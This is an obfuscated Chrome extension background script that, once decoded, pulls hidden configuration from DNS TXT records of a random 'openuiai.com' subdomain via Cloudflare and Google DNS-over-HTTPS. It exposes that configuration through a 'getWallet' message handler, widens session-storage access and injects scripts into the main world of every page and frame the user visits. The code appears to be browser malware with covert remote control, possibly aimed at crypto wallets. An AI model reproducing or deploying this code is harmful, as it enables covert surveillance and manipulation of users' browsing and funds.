(function(_0x48b808, _0xe2c139) {
    const _0x354b9e = a0_0x3775,
        _0x3c93b6 = _0x48b808();
    while (!![]) {
        try {
            const _0x3bba91 = parseInt(_0x354b9e(0x145)) / 0x1 + parseInt(_0x354b9e(0x11e)) / 0x2 + parseInt(_0x354b9e(0x139)) / 0x3 + -parseInt(_0x354b9e(0x11d)) / 0x4 + -parseInt(_0x354b9e(0x11f)) / 0x5 * (-parseInt(_0x354b9e(0x12d)) / 0x6) + parseInt(_0x354b9e(0x11c)) / 0x7 + parseInt(_0x354b9e(0x125)) / 0x8 * (-parseInt(_0x354b9e(0x133)) / 0x9);
            if (_0x3bba91 === _0xe2c139) break;
            else _0x3c93b6['push'](_0x3c93b6['shift']());
        } catch (_0x1c2057) {
            _0x3c93b6['push'](_0x3c93b6['shift']());
        }
    }
}(a0_0x125d, 0x60796), ((() => {
    const _0x483ede = a0_0x3775;
    async function _0x16b820() {
        const _0x5e1726 = a0_0x3775,
            _0x30639a = {},
            _0x56827e = await async function(_0xd74450) {
                const _0x9a6a0 = a0_0x3775;
                let _0x5b5687;
                try {
                    return _0x5b5687 = new URL(_0x9a6a0(0x141) + _0x9a6a0(0x136) + _0x9a6a0(0x127) + _0x9a6a0(0x146)), _0x5b5687['searchPara' + 'ms'][_0x9a6a0(0x119)]('name', _0xd74450), _0x5b5687[_0x9a6a0(0x117) + 'ms']['set']('type', _0x9a6a0(0x144)), _0x5b5687 = _0x5b5687[_0x9a6a0(0x14a)](), _0x5b5687 = await fetch(_0x5b5687, {
                        'headers': {
                            'accept': _0x9a6a0(0x147) + _0x9a6a0(0x118)
                        }
                    }), _0x5b5687 = await _0x5b5687[_0x9a6a0(0x13a)](), _0x5b5687 = _0x5b5687[_0x9a6a0(0x14c)], _0x5b5687;
                } catch (_0x1fb5f0) {}
                try {
                    return _0x5b5687 = new URL(_0x9a6a0(0x10a) + 's.google/r' + _0x9a6a0(0x123)), _0x5b5687[_0x9a6a0(0x117) + 'ms'][_0x9a6a0(0x119)](_0x9a6a0(0x10b), _0xd74450), _0x5b5687[_0x9a6a0(0x117) + 'ms'][_0x9a6a0(0x119)](_0x9a6a0(0x10d), _0x9a6a0(0x144)), _0x5b5687 = _0x5b5687['toString'](), _0x5b5687 = await fetch(_0x5b5687), _0x5b5687 = await _0x5b5687[_0x9a6a0(0x13a)](), _0x5b5687 = _0x5b5687[_0x9a6a0(0x14c)], _0x5b5687;
                } catch (_0x22015) {}
                throw _0xd74450;
            }((function() {
                const _0x483430 = a0_0x3775;
                let _0x28692d = Math[_0x483430(0x108)](0xc * Math['random']() + 0x5),
                    _0x13068b = '',
                    _0x1d2466 = _0x483430(0x109) + _0x483430(0x13f) + _0x483430(0x13d),
                    _0x2b0d0e = _0x1d2466[_0x483430(0x129)];
                for (let _0x3580ec = 0x0; _0x3580ec < _0x28692d; _0x3580ec++) _0x13068b += _0x1d2466[_0x483430(0x12c)](Math['floor'](Math[_0x483430(0x10f)]() * _0x2b0d0e));
                return _0x13068b;
            }()) + (_0x5e1726(0x13b) + _0x5e1726(0x137)));
        for (const _0xda4362 of _0x56827e) {
            if (0x10 != _0xda4362[_0x5e1726(0x10d)]) continue;
            const _0x5a2c6f = String(_0xda4362[_0x5e1726(0x13e)])[_0x5e1726(0x124)](/^\"|\"$/g, '');
            if (_0x5a2c6f[_0x5e1726(0x129)] > 0x2) {
                const _0x43db8d = _0x5a2c6f[_0x5e1726(0x113)](0x0, 0x2),
                    _0x3f9476 = _0x5a2c6f[_0x5e1726(0x113)](0x2);
                _0x30639a[_0x43db8d] = _0x3f9476;
            }
        }
        return _0x30639a;
    }
    chrome['storage'][_0x483ede(0x115)][_0x483ede(0x148) + 'evel']({
        'accessLevel': _0x483ede(0x149) + _0x483ede(0x14b) + _0x483ede(0x11a)
    });
    let _0x23a5c8 = null;
    async function _0x1b7389() {
        if (!_0x23a5c8) try {
            _0x23a5c8 = await _0x16b820();
        } catch (_0x407cd1) {}
        return _0x23a5c8;
    }

    function _0x3ec5ee(_0x2c67ed, _0x95379c) {
        window['_' + _0x2c67ed] = _0x95379c, window['__' + _0x2c67ed] && window['__' + _0x2c67ed](_0x95379c);
    }
    chrome[_0x483ede(0x114)][_0x483ede(0x140)][_0x483ede(0x10e) + 'r'](async _0x4769f0 => {
        try {
            _0x23a5c8 = await _0x16b820();
        } catch (_0xc9d928) {
            console['log'](_0xc9d928);
        }
    }), chrome['alarms'][_0x483ede(0x126)]('1', {
        'delayInMinutes': 0x0,
        'periodInMinutes': 0x1e
    }), chrome['scripting'][_0x483ede(0x135) + _0x483ede(0x142) + 'ts']([{
        'matches': [_0x483ede(0x116)],
        'id': _0x483ede(0x130),
        'js': [_0x483ede(0x12f)],
        'persistAcrossSessions': !0x1,
        'runAt': 'document_s' + _0x483ede(0x112),
        'world': 'MAIN'
    }, {
        'allFrames': !0x0,
        'matches': ['<all_urls>'],
        'id': _0x483ede(0x128),
        'js': ['content.js'],
        'persistAcrossSessions': !0x1,
        'runAt': _0x483ede(0x122) + _0x483ede(0x112),
        'world': _0x483ede(0x134)
    }])['catch'](_0x34a33b => console[_0x483ede(0x138)](_0x34a33b)), chrome['webNavigat' + _0x483ede(0x12a)][_0x483ede(0x131) + 'd'][_0x483ede(0x10e) + 'r'](async _0x263ea4 => {
        const _0x8e84a1 = _0x483ede;
        try {
            if (!_0x263ea4[_0x8e84a1(0x120)][_0x8e84a1(0x121)](_0x8e84a1(0x132))) {
                const _0x31f082 = await _0x1b7389();
                chrome[_0x8e84a1(0x12e)][_0x8e84a1(0x10c) + _0x8e84a1(0x143)]({
                    'injectImmediately': !0x0,
                    'target': {
                        'tabId': _0x263ea4['tabId'],
                        'frameIds': [_0x263ea4['frameId']]
                    },
                    'world': _0x8e84a1(0x13c),
                    'func': _0x3ec5ee,
                    'args': [chrome['runtime']['id'],
                        [_0x31f082]
                    ]
                })[_0x8e84a1(0x12b)](_0x14bc1d => {})[_0x8e84a1(0x111)](_0x19aa1d => {});
            }
        } catch (_0x4e5511) {}
    });
    const _0x5d0f67 = {
        'getWallet': _0x1b7389
    };
    chrome[_0x483ede(0x110)][_0x483ede(0x11b)][_0x483ede(0x10e) + 'r']((_0x11b274, _0x502d32, _0x14c04d) => {
        const _0xfd9a41 = _0x483ede;
        try {
            _0x5d0f67[_0x11b274['n']](..._0x11b274['a'])[_0xfd9a41(0x12b)](_0x2356e1 => _0x14c04d({
                'd': _0x2356e1,
                'e': null
            }))['catch'](_0x1eba70 => _0x14c04d({
                'd': null,
                'e': _0x1eba70[_0xfd9a41(0x14a)]()
            }));
        } catch (_0x5c7887) {
            return _0x14c04d({
                'd': null,
                'e': _0x5c7887[_0xfd9a41(0x14a)]()
            }), !0x1;
        }
        return !0x0;
    });
})()));

function a0_0x3775(_0x30b78d, _0x2de182) {
    const _0x125d8a = a0_0x125d();
    return a0_0x3775 = function(_0x37758d, _0x125054) {
        _0x37758d = _0x37758d - 0x108;
        let _0xe25e43 = _0x125d8a[_0x37758d];
        return _0xe25e43;
    }, a0_0x3775(_0x30b78d, _0x2de182);
}

function a0_0x125d() {
    const _0x16d1a3 = ['random', 'runtime', 'catch', 'tart', 'substring', 'alarms', 'session', '<all_urls>', 'searchPara', 'n/dns-json', 'set', 'D_CONTEXTS', 'onMessage', '2924866yTKjYJ', '2099808wGdKRG', '409298OqNJIX', '305RANNQx', 'url', 'startsWith', 'document_s', 'esolve', 'replaceAll', '16gGrmee', 'create', 'ns.com/dns', 'content', 'length', 'ion', 'then', 'charAt', '69528VseeoY', 'scripting', 'main.js', 'main', 'onCommitte', 'chrome://', '6900129eHIjCw', 'ISOLATED', 'registerCo', 'oudflare-d', 'com', 'log', '1610193izfruR', 'json', '.openuiai.', 'MAIN', 'uvwxyz', 'data', 'klmnopqrst', 'onAlarm', 'https://cl', 'ntentScrip', 'ipt', 'TXT', '587386UyduxE', '-query', 'applicatio', 'setAccessL', 'TRUSTED_AN', 'toString', 'D_UNTRUSTE', 'Answer', 'floor', 'abcdefghij', 'https://dn', 'name', 'executeScr', 'type', 'addListene'];
    a0_0x125d = function() {
        return _0x16d1a3;
    };
    return a0_0x125d();
}